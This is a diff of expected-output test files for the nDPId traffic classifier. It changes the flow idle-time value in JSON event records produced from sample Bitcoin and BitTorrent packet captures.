-00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1301328699856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699856,"pkt":"ACNshovhACPrIpS0CABFAACdBc9AAHUGaMnD2hCywKgBjiCN2GjjI7MTQQ13l4AYAQQ8gQAAAQEICgAAIhwnMvkf+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAAA4s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthoAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/D2hCyII0FGo5IhpYwXgAKwwEA"} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1301328699969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328699969,"pkt":"ACNshovhACPrIpS0CABFAABIBdlAAHUGaRTD2hCywKgBjiCN2GjjI7N8QQ13l4AYAQRZWQAAAQEICgAAIignMvkg+b602XZlcmFjawAAAAAAAAAAAAA="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1301328699728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699728,"pkt":"ACPrIpS0ACNshovhCABFAACdK9RAAEAGd8TAqAGOw9oQsthoII1BDXcu4yOzE4AY\/\/9L7wAAAQEICicy+R8AACIN+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAA7s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/w9oQsiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII38Ree1v7hQ3gC4wAEA"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1301328699856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699856,"pkt":"ACNshovhACPrIpS0CABFAACdBc9AAHUGaMnD2hCywKgBjiCN2GjjI7MTQQ13l4AYAQQ8gQAAAQEICgAAIhwnMvkf+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAAA4s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthoAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/D2hCyII0FGo5IhpYwXgAKwwEA"} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1301328699969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328699969,"pkt":"ACNshovhACPrIpS0CABFAABIBdlAAHUGaRTD2hCywKgBjiCN2GjjI7N8QQ13l4AYAQRZWQAAAQEICgAAIignMvkg+b602XZlcmFjawAAAAAAAAAAAAA="} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":495,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":495,"packets-processed":494,"total-skipped-flows":0,"total-l4-data-len":520135,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":5,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1301329138452} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1301329304767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304767,"pkt":"ACPrIpS0ACNshovhCABFAACdDAhAAEAGDmvAqAGOuDqld9i\/II0stRatNDMFDIAY\/\/9S8AAAAQEICiczELoAVdzf+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAACYtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/uDqldyCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII0b7ZMAlkQ1dwALwwEA"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1301329304813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304813,"pkt":"ACNshovhACPrIpS0CABFAACdBMxAAHQG4aa4OqV3wKgBjiCN2L80MwUMLLUWrYAYAQTgGAAAAQEICgBV3OcnMxC6+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAACQtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHti\/AQAAAAAAAAAAAAAAAAAAAAAA\/\/+4OqV3II2BHa1kLxLeCgCuwgEA"} -00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1301329305005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1301329305005,"pkt":"ACPrIpS0ACNshovhCABFAACX6RJAAEAGMWbAqAGOuDqld9i\/II0stRcWNDMFdYAY\/\/+hogAAAQEICiczEL0AVdz7+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZYWRkcgAAAAAAAAAAHwAAAKr+QCYBbLWQTQEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHiCN"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1301329304767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304767,"pkt":"ACPrIpS0ACNshovhCABFAACdDAhAAEAGDmvAqAGOuDqld9i\/II0stRatNDMFDIAY\/\/9S8AAAAQEICiczELoAVdzf+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAACYtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/uDqldyCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII0b7ZMAlkQ1dwALwwEA"} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1301329304813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304813,"pkt":"ACNshovhACPrIpS0CABFAACdBMxAAHQG4aa4OqV3wKgBjiCN2L80MwUMLLUWrYAYAQTgGAAAAQEICgBV3OcnMxC6+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAACQtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHti\/AQAAAAAAAAAAAAAAAAAAAAAA\/\/+4OqV3II2BHa1kLxLeCgCuwgEA"} +00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1301329305005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1301329305005,"pkt":"ACPrIpS0ACNshovhCABFAACX6RJAAEAGMWbAqAGOuDqld9i\/II0stRcWNDMFdYAY\/\/+hogAAAQEICiczEL0AVdz7+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZYWRkcgAAAAAAAAAAHwAAAKr+QCYBbLWQTQEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHiCN"} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":622,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":622,"packets-processed":621,"total-skipped-flows":0,"total-l4-data-len":537564,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":6,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1301329743430} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":637,"packets-processed":637,"total-skipped-flows":0,"total-l4-data-len":539032,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":42,"global_ts_msec":1301329810839} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 637/637 diff --git a/test/results/bittorrent.pcap.out b/test/results/bittorrent.pcap.out index b410479b8..532e98b75 100644 --- a/test/results/bittorrent.pcap.out +++ b/test/results/bittorrent.pcap.out @@ -1,136 +1,136 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bittorrent.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1455469967246} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967246,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4eD1AAEAGAADAqAEDUjrYc86YlaHFzANOp3OTAoAY\/\/\/swwAAAQEIChnb8BkAhEMxE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhgayboXmHFSZj4="} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 